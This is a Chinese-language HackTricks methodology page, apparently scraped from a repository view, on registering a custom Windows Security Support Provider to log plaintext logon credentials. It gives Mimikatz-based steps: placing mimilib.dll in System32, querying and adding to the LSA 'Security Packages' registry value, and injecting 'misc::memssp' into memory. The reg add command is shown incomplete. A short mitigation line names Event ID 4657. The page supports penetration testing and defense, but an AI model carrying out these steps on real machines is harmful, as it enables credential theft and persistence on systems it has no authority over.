hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2023-08-03 19:12:22 +00:00

4.3 KiB
Raw Blame History

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

自定义 SSP

在这里了解什么是 SSP安全支持提供者
你可以创建自己的 SSP 来捕获用于访问机器的凭据明文

Mimilib

你可以使用 Mimikatz 提供的 mimilib.dll 二进制文件。这将在一个文件中记录所有明文凭据。
将 dll 放在 C:\Windows\System32\ 目录下
获取现有的 LSA 安全包列表:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

mimilib.dll添加到安全支持提供程序列表(安全包)中:

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

在内存中

您还可以直接使用Mimikatz将其注入到内存中请注意这可能会有点不稳定/无法正常工作):

privilege::debug
misc::memssp

这个方法在重启后不会生效。

缓解措施

事件ID 4657 - 审计HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages的创建/更改

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥